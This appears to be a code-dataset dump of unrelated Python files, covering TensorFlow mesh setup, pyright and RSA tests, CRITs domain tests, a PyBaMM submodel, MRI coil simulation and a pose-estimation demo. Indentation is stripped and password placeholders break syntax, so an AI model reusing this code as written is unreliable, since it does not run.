tf2.summary.scalar(name, tf.reduce_mean(tensor), step=global_step)
else:
tf2.summary.image(name, tensor, step=global_step)
return tf.summary.all_v2_summary_ops()
global_step_t = tf.reshape(tf.to_int32(tf.train.get_global_step()), [1])
return host_call_fn, [global_step_t] + reshaped_tensors
def simd_mesh_setup(params, mesh_shape, layout_rules):
"""Constructs SimdMesh function - instructions on how to evenly split tensors across all TPU cores"""
num_hosts = params["context"].num_hosts
host_placement_fn = params["context"].tpu_host_placement_function
device_list = [host_placement_fn(host_id=i) for i in range(num_hosts)]
tf.logging.info(f"device_list = {device_list}")
# TODO: Better estimation of replica cache size?
replica_cache_size = 300 * 1000000 # 300M per replica
# Worker 0 caches all the TPU binaries
worker0_mem = replica_cache_size * params["context"].num_replicas
devices_memory_usage = [worker0_mem] + [0] * (num_hosts - 1)
var_placer = mtf.utils.BalancedVariablePlacer(device_list, devices_memory_usage)
mesh_devices = [""] * mesh_shape.size
mesh_impl = mtf.simd_mesh_impl.SimdMeshImpl(
mesh_shape, layout_rules, mesh_devices, params["context"].device_assignment)
return var_placer, mesh_impl
def setup_logging(args, logdir="logs"):
os.makedirs(logdir, exist_ok=True)
tf.logging.set_verbosity(logging.INFO)
tf.get_logger().propagate = False # Remove double log on console
name = os.path.splitext(os.path.basename(args.model))[0]
handlers = [
logging.FileHandler(f"logs/{name}.log"),
logging.StreamHandler(sys.stdout)
]
logger = logging.getLogger("tensorflow")
logger.handlers = handlers
return logger
class ScalarSummaryOperation(Operation):
"""Similar to tf.Print."""
def __init__(self, name, x):
super(ScalarSummaryOperation, self).__init__(
[x], x.mesh, name=name)
self._outputs = [Tensor(self, x.shape, x.dtype)]
def lower(self, lowering):
lowered_input = lowering.tensors[self.inputs[0]].to_laid_out_tensor()
tf.add_to_collection(mtf.utils.SCALAR_SUMMARIES_COLLECTION_KEY,
(self.name, lowered_input.tensor_list[0]))
lowering.set_tensor_lowering(
self.outputs[0], lowered_input)
def gradient(self, grad_ys):
return grad_ys
def scalar_summary(name, x):
"""Call tf.summary.scalar.
Caveat - summaries do not generally work on TPU - they need to be rewritten
into a host call.
TODO(noam): provide a pointer to code for this.
Args:
name: a string
x: a 0-dimensional Tensor
Returns:
a Tensor which is identical in value to x
"""
return ScalarSummaryOperation(name, x) |
packages/pyright-internal/src/tests/samples/genericTypes4.py | sasano8/pyright | 4,391 | 12691682 | <reponame>sasano8/pyright
# This sample tests type inference and TypeVar matching.
from typing import Union
m = int(1)
n = float(1.1)
p = "hello"
a = dict(x=m, y=m)
a1: int = a["x"]
b = dict(x=n, y=n)
# This should generate an error because b should be
# typed as dict[Any, float], and b["x"] is a float.
b1: int = b["x"]
b2: float = b["x"]
c = dict(x=m, y=n)
# This should generate an error because d should be
# typed as dict[Any, float].
c1: int = c["x"]
c2: float = c["x"]
d = dict(x=p, y=p)
# This should generate an error because d should be
# typed as dict[Any, str].
d1: float = d["x"]
d2: str = d["x"]
e = dict(x=n, y=p)
# This should generate an error because d should be
# typed as dict[Any, str].
e1: str = e["x"]
# This should generate an error because d should be
# typed as dict[Any, str].
e2: float = e["x"]
e3: Union[float, str] = e["x"]
|
third_party/gsutil/third_party/rsa/tests/test_common.py | tingshao/catapult | 5,079 | 12691690 | <gh_stars>1000+
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2011 <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import struct
from rsa._compat import byte, b
from rsa.common import byte_size, bit_size, _bit_size
class TestByte(unittest.TestCase):
def test_values(self):
self.assertEqual(byte(0), b('\x00'))
self.assertEqual(byte(255), b('\xff'))
def test_struct_error_when_out_of_bounds(self):
self.assertRaises(struct.error, byte, 256)
self.assertRaises(struct.error, byte, -1)
class TestByteSize(unittest.TestCase):
def test_values(self):
self.assertEqual(byte_size(1 << 1023), 128)
self.assertEqual(byte_size((1 << 1024) - 1), 128)
self.assertEqual(byte_size(1 << 1024), 129)
self.assertEqual(byte_size(255), 1)
self.assertEqual(byte_size(256), 2)
self.assertEqual(byte_size(0xffff), 2)
self.assertEqual(byte_size(0xffffff), 3)
self.assertEqual(byte_size(0xffffffff), 4)
self.assertEqual(byte_size(0xffffffffff), 5)
self.assertEqual(byte_size(0xffffffffffff), 6)
self.assertEqual(byte_size(0xffffffffffffff), 7)
self.assertEqual(byte_size(0xffffffffffffffff), 8)
def test_zero(self):
self.assertEqual(byte_size(0), 1)
def test_bad_type(self):
self.assertRaises(TypeError, byte_size, [])
self.assertRaises(TypeError, byte_size, ())
self.assertRaises(TypeError, byte_size, dict())
self.assertRaises(TypeError, byte_size, "")
self.assertRaises(TypeError, byte_size, None)
class TestBitSize(unittest.TestCase):
def test_zero(self):
self.assertEqual(bit_size(0), 0)
def test_values(self):
self.assertEqual(bit_size(1023), 10)
self.assertEqual(bit_size(1024), 11)
self.assertEqual(bit_size(1025), 11)
self.assertEqual(bit_size(1 << 1024), 1025)
self.assertEqual(bit_size((1 << 1024) + 1), 1025)
self.assertEqual(bit_size((1 << 1024) - 1), 1024)
self.assertEqual(_bit_size(1023), 10)
self.assertEqual(_bit_size(1024), 11)
self.assertEqual(_bit_size(1025), 11)
self.assertEqual(_bit_size(1 << 1024), 1025)
self.assertEqual(_bit_size((1 << 1024) + 1), 1025)
self.assertEqual(_bit_size((1 << 1024) - 1), 1024)
|
models/flow_model.py | fyviezhao/dressing-in-order | 172 | 12691726 | from .dior_model import *
from utils.util import StoreList, StoreDictKeyPair
from models.networks.block_extractor.block_extractor import BlockExtractor
class FlowModel(DIORModel):
def __init__(self, opt):
opt.frozen_flownet = False
DIORModel.__init__(self, opt)
self.netE_opt = opt.netE
self.visual_names = ['from_img', 'to_img', 'fake_B']
def _init_models(self, opt):
self.model_names += ["Flow"]
self.netFlow = networks.define_tool_networks(tool='flownet', load_ckpt_path=opt.flownet_path, gpu_ids=opt.gpu_ids)
self.extractor = BlockExtractor(kernel_size=1)
def forward(self):
"""Run forward pass; called by both functions <optimize_parameters> and <test>."""
self.flow_fields, _ = self.netFlow(self.from_img, self.from_kpt, self.to_kpt)
_, _, H, W = self.flow_fields[-1].size()
from_img = F.interpolate(self.from_img, (H,W))
self.fake_B = self.extractor(from_img, self.flow_fields[-1])
_, _, H, W = self.to_img.size()
self.fake_B = F.interpolate(self.fake_B, (H,W))
def backward_G(self):
self.loss_G = 0
flow_feilds = self.flow_fields
self.loss_flow_cor = 0.0
if self.loss_coe['flow_cor'] > 0:
self.loss_flow_cor = self.Correctness(self.to_img, self.from_img, flow_feilds, [2,3]) * self.loss_coe['flow_cor']
self.loss_G = self.loss_G + self.loss_flow_cor
self.loss_flow_reg = 0.0
if self.loss_coe['flow_reg'] > 0:
# import pdb; pdb.set_trace()
self.loss_flow_reg = self.Regularization(flow_feilds) * self.loss_coe['flow_reg']
self.loss_G = self.loss_G + self.loss_flow_reg
def optimize_parameters(self):
self.forward() # compute fake images: G(A)
# update G
self.optimizer_G.zero_grad() # set G's gradients to zero
self.backward_G() # calculate graidents for G
self.loss_G.backward()
self.optimizer_G.step() # udpate G's weights
self.log_loss_update()
|
crits/domains/tests.py | dutrow/crits | 738 | 12691748 | from django.test import SimpleTestCase
from django.test.client import RequestFactory
import crits.domains.views as views
import crits.domains.handlers as handlers
from crits.core.user import CRITsUser
from crits.core.handlers import add_new_source
from crits.core.source_access import SourceAccess
TSRC = "TestSource"
TUSER_NAME = "test_user"
TUSER_PASS = <PASSWORD>"
TUSER_EMAIL = "<EMAIL>"
TUSER_ROLE = "Administrator"
DOM_REF = ""
DOM_SRC = TSRC
DOM_METH = ""
DOMAIN = "example.com"
def prep_db():
"""
Prep database for test.
"""
clean_db()
# Add Source
add_new_source(TSRC, "RandomUser")
# Add User
user = CRITsUser.create_user(
username=TUSER_NAME,
password=<PASSWORD>,
email=TUSER_EMAIL,
)
user.save()
def clean_db():
"""
Clean database for test.
"""
src = SourceAccess.objects(name=TSRC).first()
if src:
src.delete()
user = CRITsUser.objects(username=TUSER_NAME).first()
if user:
user.delete()
class DomainHandlerTests(SimpleTestCase):
"""
Test Domain Handlers
"""
def setUp(self):
prep_db()
self.factory = RequestFactory()
self.user = CRITsUser.objects(username=TUSER_NAME).first()
self.user.save()
def tearDown(self):
clean_db()
def testDomainAdd(self):
data = {
'domain_reference': DOM_REF,
'domain_source': DOM_SRC,
'domain_method': DOM_METH,
'domain': DOMAIN,
}
errors = []
(result, errors, retVal) = handlers.add_new_domain(data, self, errors)
class DomainViewTests(SimpleTestCase):
"""
Test Domain Views
"""
def setUp(self):
prep_db()
self.factory = RequestFactory()
self.user = CRITsUser.objects(username=TUSER_NAME).first()
self.user.save()
# Add a test domain
data = {
'domain_reference': DOM_REF,
'domain_source': DOM_SRC,
'domain_method': DOM_METH,
'domain': DOMAIN,
}
errors = []
(result, errors, retVal) = handlers.add_new_domain(data, self, errors)
def tearDown(self):
clean_db()
def testUserInactiveRedirect(self):
self.req = self.factory.get('/domains/list/')
self.req.user = self.user
self.req.user.mark_inactive()
response = views.domains_listing(self.req)
self.assertEqual(response.status_code, 302)
self.assertTrue("/login/?next=/domains/list/" in response['Location'])
self.req.user.mark_active()
response = views.domains_listing(self.req)
self.assertEqual(response.status_code, 200)
def testDomainsList(self):
self.req = self.factory.get('/domains/list/')
self.req.user = self.user
response = views.domains_listing(self.req)
self.assertEqual(response.status_code, 200)
self.assertTrue("#domain_listing" in response.content)
def testDomainsjtList(self):
self.req = self.factory.post('/domains/list/jtlist/',
{},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.req.user = self.user
response = views.domains_listing(self.req, 'jtlist')
self.assertEqual(response.status_code, 200)
|
autogoal/datasets/yeast.py | lsuarez98/autogoal | 157 | 12691776 | <filename>autogoal/datasets/yeast.py<gh_stars>100-1000
import numpy as np
import os
from autogoal.datasets import datapath, download
from sklearn.feature_extraction import DictVectorizer
def load():
"""
Loads corpora from [Yeast uci dataset](https://archive.ics.uci.edu/ml/datasets/Yeast).
##### Examples
```python
>>> X, y = load()
>>> X.shape
(1484, 8)
>>> len(y)
1484
```
"""
try:
download("yeast")
except:
print(
"Error loading data. This may be caused due to bad connection. Please delete badly downloaded data and retry"
)
raise
f = open(datapath("yeast") / "yeast.data", "r")
X = []
y = []
for i in f:
clean_line = i.strip().split()
temp = {}
temp["1"] = float(clean_line[1])
temp["2"] = float(clean_line[2])
temp["3"] = float(clean_line[3])
temp["4"] = float(clean_line[4])
temp["5"] = float(clean_line[5])
temp["6"] = float(clean_line[6])
temp["7"] = float(clean_line[7])
temp["8"] = float(clean_line[8])
X.append(temp)
y.append(clean_line[9])
return _load_onehot(X, y)
def _load_onehot(X, y):
vec = DictVectorizer(sparse=False)
return vec.fit_transform(X), np.asarray(y)
|
www/src/Lib/logging/brython_handlers.py | raspberrypieman/brython | 5,926 | 12691777 | import logging
from browser.ajax import ajax
class XMLHTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, url, method="GET"):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
self.url = url
self.method = method
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by <NAME>.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
req = ajax.open(self.method, self.url, sync=False)
req.send(self.mapLogRecord(record))
except:
self.handleError(record)
|
pybamm/models/submodels/tortuosity/bruggeman_tortuosity.py | manjunathnilugal/PyBaMM | 330 | 12691790 | #
# Class for Bruggeman tortuosity
#
import pybamm
from .base_tortuosity import BaseModel
class Bruggeman(BaseModel):
"""Submodel for Bruggeman tortuosity
Parameters
----------
param : parameter class
The parameters to use for this submodel
phase : str
The material for the model ('electrolyte' or 'electrode').
options : dict, optional
A dictionary of options to be passed to the model.
**Extends:** :class:`pybamm.tortuosity.BaseModel`
"""
def __init__(self, param, phase, options=None, set_leading_order=False):
super().__init__(param, phase, options=options)
self.set_leading_order = set_leading_order
def get_coupled_variables(self, variables):
param = self.param
if self.phase == "Electrolyte":
if self.half_cell:
tor_n = None
else:
eps_n = variables["Negative electrode porosity"]
tor_n = eps_n ** param.b_e_n
eps_s = variables["Separator porosity"]
tor_s = eps_s ** param.b_e_s
eps_p = variables["Positive electrode porosity"]
tor_p = eps_p ** param.b_e_p
elif self.phase == "Electrode":
if self.half_cell:
tor_n = None
else:
eps_n = variables["Negative electrode active material volume fraction"]
tor_n = eps_n ** param.b_s_n
eps_p = variables["Positive electrode active material volume fraction"]
tor_s = pybamm.FullBroadcast(0, "separator", "current collector")
tor_p = eps_p ** param.b_s_p
variables.update(
self._get_standard_tortuosity_variables(
tor_n, tor_s, tor_p, self.set_leading_order
)
)
return variables
|
tests/test_testbase/test_retry.py | molayxu/QTAF | 452 | 12691795 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
#
# Tencent is pleased to support the open source community by making QTA available.
# Copyright (C) 2016THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the BSD 3-Clause License (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
#
"""test cases for retry mechanism
"""
import time
import unittest
from testbase.retry import Retry, RetryLimitExcceeded
class TestRetry(unittest.TestCase):
"""test retry with invalid calllee
"""
def test_retry_with_timeout(self):
def dummy(toggle_time,start_ts):
if time.time() - start_ts > toggle_time:
return True
interval = 1
timeout = 5
retry = Retry(interval=interval, timeout=timeout)
self.assertRaises(ValueError, retry.call, None)
start_time = time.time()
try:
retry.call(dummy, timeout+1, start_time)
except RetryLimitExcceeded:
time_cost = time.time() - start_time
self.assertGreaterEqual(time_cost, 5, "actual timeout=%s is less than specified timeout=%s" % (time_cost, timeout))
else:
self.fail("no RetryLimitExcceeded raised")
start_time = time.time()
count = 0
retry = Retry(interval=interval, timeout=timeout)
for retry_item in retry:
count += 1
self.assertEqual(count, retry_item.iteration, "iteration does not match")
if dummy(2, start_time):
time_cost = time.time() - start_time
self.assertGreaterEqual(time_cost, 2, "actual interval=%s is less than specified interval=%s" % (time_cost/float(count), interval))
break
else:
self.fail("unexpected timeout")
def test_retry_with_count(self):
def dummy(param):
param[0] += 1
if param[0] > 2:
return True
retry = Retry(limit=1)
self.assertRaises(ValueError, retry.call, None)
x = [0]
try:
retry.call(dummy, x)
except RetryLimitExcceeded:
pass
else:
self.fail("no RetryLimitExcceeded was raised")
x = [0]
retry = Retry(limit=3)
try:
retry.call(dummy, x)
except RetryLimitExcceeded:
self.fail("RetryLimitExcceeded was raised")
x = [0]
retry = Retry(limit=3, interval=None)
retry_count = 0
start_time = time.time()
for retry_item in retry:
retry_count +=1
self.assertEqual(retry_count, retry_item.iteration, "iteration does not match")
if dummy(x):
self.assertEqual(retry_count, 3, "iteration does not match")
break
time_cost = time.time() - start_time
self.assertLess(time_cost, 0.05, "interval is unexpected")
x = [-5]
limit=3
retry = Retry(limit=limit, interval=0.5, raise_error=False)
start_time = time.time()
retry.call(dummy, x)
time_cost = time.time() - start_time
self.assertGreaterEqual(time_cost + 0.1, (limit-1)*0.5, "interval has no effect.")
if __name__ == "__main__":
defaultTest="TestRetry.test_retry_with_count"
defaultTest=None
unittest.main(defaultTest=defaultTest)
|
mining/controllers/api/widget.py | nuaadot/mining | 785 | 12691802 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from bottle import Bottle
from bottle.ext.mongo import MongoPlugin
from mining.utils import conf
from .base import get, post, put, delete
collection = 'widget'
widget_app = Bottle()
mongo = MongoPlugin(
uri=conf("mongodb")["uri"],
db=conf("mongodb")["db"],
json_mongo=True)
widget_app.install(mongo)
@widget_app.route('/', method='GET')
@widget_app.route('/<slug>', method='GET')
def widget_get(mongodb, slug=None):
return get(mongodb, collection, slug)
@widget_app.route('/', method='POST')
def widget_post(mongodb, slug=None):
return post(mongodb, collection)
@widget_app.route('/<slug>', method='PUT')
def widget_put(mongodb, slug=None):
return put(mongodb, collection, slug)
@widget_app.route('/<slug>', method='DELETE')
def widget_delete(mongodb, slug=None):
return delete(mongodb, collection, slug)
|
notebooks/mrisensesim.py | ckolbPTB/torchkbnufft | 122 | 12691891 | import numpy as np
def mrisensesim(size, ncoils=8, array_cent=None, coil_width=2, n_rings=None, phi=0):
"""Apply simulated sensitivity maps. Based on a script by <NAME>.
Args:
size (tuple): Size of the image array for the sensitivity coils.
nc_range (int, default: 8): Number of coils to simulate.
array_cent (tuple, default: 0): Location of the center of the coil
array.
coil_width (double, default: 2): Parameter governing the width of the
coil, multiplied by actual image dimension.
n_rings (int, default: ncoils // 4): Number of rings for a
cylindrical hardware set-up.
phi (double, default: 0): Parameter for rotating coil geometry.
Returns:
list: A list of dimensions (ncoils, (N)), specifying spatially-varying
sensitivity maps for each coil.
"""
if array_cent is None:
c_shift = [0, 0, 0]
elif len(array_cent) < 3:
c_shift = array_cent + (0,)
else:
c_shift = array_cent
c_width = coil_width * min(size)
if len(size) > 2:
if n_rings is None:
n_rings = ncoils // 4
c_rad = min(size[0:1]) / 2
smap = []
if len(size) > 2:
zz, yy, xx = np.meshgrid(
range(size[2]), range(size[1]), range(size[0]), indexing="ij"
)
else:
yy, xx = np.meshgrid(range(size[1]), range(size[0]), indexing="ij")
if ncoils > 1:
x0 = np.zeros((ncoils,))
y0 = np.zeros((ncoils,))
z0 = np.zeros((ncoils,))
for i in range(ncoils):
if len(size) > 2:
theta = np.radians((i - 1) * 360 / (ncoils + n_rings) + phi)
else:
theta = np.radians((i - 1) * 360 / ncoils + phi)
x0[i] = c_rad * np.cos(theta) + size[0] / 2
y0[i] = c_rad * np.sin(theta) + size[1] / 2
if len(size) > 2:
z0[i] = (size[2] / (n_rings + 1)) * (i // n_rings)
smap.append(
np.exp(
-1
* ((xx - x0[i]) ** 2 + (yy - y0[i]) ** 2 + (zz - z0[i]) ** 2)
/ (2 * c_width)
)
)
else:
smap.append(
np.exp(-1 * ((xx - x0[i]) ** 2 + (yy - y0[i]) ** 2) / (2 * c_width))
)
else:
x0 = c_shift[0]
y0 = c_shift[1]
z0 = c_shift[2]
if len(size) > 2:
smap = np.exp(
-1 * ((xx - x0) ** 2 + (yy - y0) ** 2 + (zz - z0) ** 2) / (2 * c_width)
)
else:
smap = np.exp(-1 * ((xx - x0) ** 2 + (yy - y0) ** 2) / (2 * c_width))
side_mat = np.arange(int(size[0] // 2) - 20, 1, -1)
side_mat = np.reshape(side_mat, (1,) + side_mat.shape) * np.ones(shape=(size[1], 1))
cent_zeros = np.zeros(shape=(size[1], size[0] - side_mat.shape[1] * 2))
ph = np.concatenate((side_mat, cent_zeros, side_mat), axis=1) / 10
if len(size) > 2:
ph = np.reshape(ph, (1,) + ph.shape)
for i, s in enumerate(smap):
smap[i] = s * np.exp(i * 1j * ph * np.pi / 180)
return smap
|
demo_gl.py | wangqr/VNect-tensorflow | 489 | 12691914 | <filename>demo_gl.py
import caffe
import argparse
import os
import cv2
import numpy as np
import time
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import pygame
from pygame.locals import *
from OpenGL.GL import *
from OpenGL.GLU import *
import utils
parser = argparse.ArgumentParser()
parser.add_argument('--device', default='gpu')
parser.add_argument('--model_dir', default='/media/tim_ho/HDD1/Projects/VNect-tensorflow/models')
parser.add_argument('--input_size', default=368)
parser.add_argument('--num_of_joints', default=21)
parser.add_argument('--pool_scale', default=8)
parser.add_argument('--plot_2d', default=False)
parser.add_argument('--plot_3d', default=False)
args = parser.parse_args()
joint_color_code = [[139, 53, 255],
[0, 56, 255],
[43, 140, 237],
[37, 168, 36],
[147, 147, 0],
[70, 17, 145]]
# Limb parents of each joint
limb_parents = [1, 15, 1, 2, 3, 1, 5, 6, 14, 8, 9, 14, 11, 12, 14, 14, 1, 4, 7, 10, 13]
# input scales
scales = [1.0, 0.7]
def demo():
joints_2d = np.zeros(shape=(args.num_of_joints, 2), dtype=np.int32)
joints_3d = np.zeros(shape=(args.num_of_joints, 3), dtype=np.float32)
if args.plot_3d:
plt.ion()
fig = plt.figure()
ax = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122)
plt.show()
if args.device == 'cpu':
caffe.set_mode_cpu()
elif args.device == 'gpu':
caffe.set_mode_gpu()
caffe.set_device(0)
else:
raise ValueError('No such device')
model_prototxt_path = os.path.join(args.model_dir, 'vnect_net.prototxt')
model_weight_path = os.path.join(args.model_dir, 'vnect_model.caffemodel')
# Load model
model = caffe.Net(model_prototxt_path,
model_weight_path,
caffe.TEST)
# Show network structure and shape
for layer_name in model.params.keys():
print(layer_name, model.params[layer_name][0].data.shape)
print('')
for i in model.blobs.keys():
print(i, model.blobs[i].data.shape)
cam = cv2.VideoCapture(0)
is_tracking = False
# for img_name in os.listdir('test_imgs'):
while True:
# if not is_tracking:
img_path = 'test_imgs/{}'.format('dance.jpg')
t1 = time.time()
input_batch = []
cam_img = utils.read_square_image('', cam, args.input_size, 'WEBCAM')
# cam_img = utils.read_square_image(img_path, '', args.input_size, 'IMAGE')
# cv2.imshow('', cam_img)
# cv2.waitKey(0)
orig_size_input = cam_img.astype(np.float32)
for scale in scales:
resized_img = utils.resize_pad_img(orig_size_input, scale, args.input_size)
input_batch.append(resized_img)
input_batch = np.asarray(input_batch, dtype=np.float32)
input_batch = np.transpose(input_batch, (0, 3, 1, 2))
input_batch /= 255.0
input_batch -= 0.4
model.blobs['data'].data[...] = input_batch
# Forward
model.forward()
# Get output data
x_hm = model.blobs['x_heatmap'].data
y_hm = model.blobs['y_heatmap'].data
z_hm = model.blobs['z_heatmap'].data
hm = model.blobs['heatmap'].data
# Trans coordinates
x_hm = x_hm.transpose([0, 2, 3, 1])
y_hm = y_hm.transpose([0, 2, 3, 1])
z_hm = z_hm.transpose([0, 2, 3, 1])
hm = hm.transpose([0, 2, 3, 1])
# Average scale outputs
hm_size = args.input_size // args.pool_scale
hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
x_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
y_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
z_hm_avg = np.zeros(shape=(hm_size, hm_size, args.num_of_joints))
for i in range(len(scales)):
rescale = 1.0 / scales[i]
scaled_hm = cv2.resize(hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
scaled_x_hm = cv2.resize(x_hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
scaled_y_hm = cv2.resize(y_hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
scaled_z_hm = cv2.resize(z_hm[i, :, :, :], (0, 0), fx=rescale, fy=rescale, interpolation=cv2.INTER_LINEAR)
mid = [scaled_hm.shape[0] // 2, scaled_hm.shape[1] // 2]
hm_avg += scaled_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
x_hm_avg += scaled_x_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
y_hm_avg += scaled_y_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
z_hm_avg += scaled_z_hm[mid[0] - hm_size // 2: mid[0] + hm_size // 2,
mid[1] - hm_size // 2: mid[1] + hm_size // 2, :]
hm_avg /= len(scales)
x_hm_avg /= len(scales)
y_hm_avg /= len(scales)
z_hm_avg /= len(scales)
t2 = time.time()
# Get 2d joints
joints_2d = utils.extract_2d_joint_from_heatmap(hm_avg, args.input_size, joints_2d)
# Get 3d joints
joints_3d = utils.extract_3d_joints_from_heatmap(joints_2d, x_hm_avg, y_hm_avg, z_hm_avg, args.input_size,
joints_3d)
print('Post FPS', 1/(time.time()-t2))
# Plot 2d location heatmap
joint_map = np.zeros(shape=(args.input_size, args.input_size, 3))
for joint_num in range(joints_2d.shape[0]):
cv2.circle(joint_map, center=(joints_2d[joint_num][1], joints_2d[joint_num][0]), radius=3,
color=(255, 0, 0), thickness=-1)
# Plot 2d limbs
limb_img = utils.draw_limbs_2d(cam_img, joints_2d, limb_parents)
# Plot 3d limbs
if args.plot_3d:
ax.clear()
ax.view_init(azim=0, elev=90)
ax.set_xlim(-700, 700)
ax.set_ylim(-800, 800)
ax.set_zlim(-700, 700)
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
utils.draw_limbs_3d(joints_3d, limb_parents, ax)
# draw heatmap
# hm_img = utils.draw_predicted_heatmap(hm_avg*200, args.input_size)
# cv2.imshow('hm', hm_img.astype(np.uint8))
# cv2.waitKey(0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
utils.draw_limb_3d_gl(joints_3d, limb_parents)
pygame.display.flip()
pygame.time.wait(1)
concat_img = np.concatenate((limb_img, joint_map), axis=1)
# ax2.imshow(concat_img[..., ::-1].astype(np.uint8))
cv2.imshow('2d', concat_img.astype(np.uint8))
cv2.waitKey(1)
# ax2.imshow(concat_img.astype(np.uint8))
# plt.pause(0.0001)
# plt.show(block=False)
print('Forward FPS', 1 / (time.time() - t1))
if __name__ == '__main__':
pygame.init()
display = (800, 600)
pygame.display.set_mode(display, DOUBLEBUF | OPENGL)
gluPerspective(70, (display[0] / display[1]), 0.1, 200.0)
view_range = 800
# glOrtho(-view_range, view_range,
# -view_range, view_range,
# -view_range, view_range)
glTranslatef(0.0, 0.0, 100)
demo()
|
CodeChef/SHORT/COOK63/Problem A/A.py | VastoLorde95/Competitive-Programming | 170 | 12691932 | <gh_stars>100-1000
from math import *
from fractions import *
def solve():
n = input()
w = raw_input().split()
l = len(w[0])
lis = []
for i in xrange(l):
for j in xrange(i+1,l):
t = w[0][i:j+1]
ok = True
for st in w:
# print t, st
if t not in st:
ok = False
break
if ok:
lis.append(t)
tmp = []
mx = 0
for st in lis:
if len(st) > mx:
mx =len(st)
for st in lis:
if len(st) == mx:
tmp.append(st)
if mx == 0:
print
else:
tmp.sort()
print tmp[0]
return
for _ in xrange(input()):
solve()
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.